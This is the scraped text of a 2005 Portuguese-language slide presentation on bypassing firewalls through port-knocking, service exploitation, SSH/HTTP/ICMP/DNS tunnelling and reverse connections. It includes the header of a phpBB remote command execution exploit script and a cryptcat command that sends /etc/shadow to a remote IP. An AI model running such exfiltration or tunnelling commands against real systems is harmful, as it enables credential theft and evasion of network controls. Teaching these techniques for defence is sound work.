Escolar Documentos
Profissional Documentos
Cultura Documentos
07 Firewalls Bypass PDF
07 Firewalls Bypass PDF
Sumrio
Introduo
Tcnicas utilizadas
Ferramentas
Testes realizados
Concluso
Introduo
Tipos de firewall:
Filtro de pacotes
Metodologia
Metodologia
DMZ
Server
Server
Internet
Joo Marcelo Ceron GTS
03/12/2005
Port-Knocking
Explorao de servios disponveis
Erros de configurao
Tunelamento via servios disponveis
Port-knocking
Port-knocking
Explorao de servios
Explorao de servios
Ataques diretos
Explorao de servios
#!/usr/bin/perl
use IO::Socket;
##
## phpBB <= 2.0.10 remote commands exec exploit
if (@ARGV < 4)
{
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
###############################################
usage:
r57phpbb2034.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la" or
Tunelamento SSH
Situao:
Abordagens
SSH
Erros de configurao
Metodologia
Tcnicas utilizadas
Firewall de nvel 3 e 4:
IP / TCP
SSH na porta 80
Proxy SSH
ssh -l user@server -d 1080
1080
ssh
SSH server
Conexes Reversas
SSH
pc.no-ip.org
Conexes Reversas
SOCAT
NetCat com esteroides
Conexes Reversas
cryptcat = netcat + encryption
servidor:
cryptcat -k ceron -l -p 23 | > /tmp/foo
cliente:
cat /etc/shadow | cryptcat -k ceron 1.1.1.1 23
Conexes Reversas
NCAT
Redirecionamento de portas
Socks proxy
./ncat --allow 127.0.0.1/32 --socks4-server -l
5001
Filtro de nvel 7
Verifica o protocolo
Todo trfego para a
porta 80 vai para o
Proxy
Proxy
Tcnicas
Conexes Reversas
Tunelamento
Esteganografia
Tunelamento
Alguns exemplos
HTTP/S tnel
Tunelamento sobre UDP
FTP tnel
Mail tnel
Msn tnel
Ack tnel
DNS tnel
Joo Marcelo Ceron GTS
03/12/2005
Tunelamento HTTP
IP
TCP
SSH
HTTP
Joo Marcelo Ceron GTS
03/12/2005
Tunelamento HTTP
Servidor
hts -F localhost:22 80
Cliente
htc -F 22 server:80
tempo (s)
2
trfego normal
3
trfego proxy
Tunelamento HTTP
Rwwwshell
Tunelamento via primitiva get ou post
Exemplo de conexo:
Cliente:
Slave GET
/cgi/bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFL
dgxEdb1He7krj HTTP/1.0
Master replies with g5mAlfbknz
Abordagens
Abordagens
Precaues
Tunel ICMP
ishd shell ping
PHP Shell
Apache rodando em
`Safe Mode`
Esteganografia
Tunelamento DNS
10.1.1.1
Joo Marcelo Ceron GTS
03/12/2005
Tunel DNS
Concluses
Trfego tunelado
Monitoramento de trfego acumulado
Proxies
Aplicaes tuneladas
Obrigado.
Perguntas ?
ceron@tche.br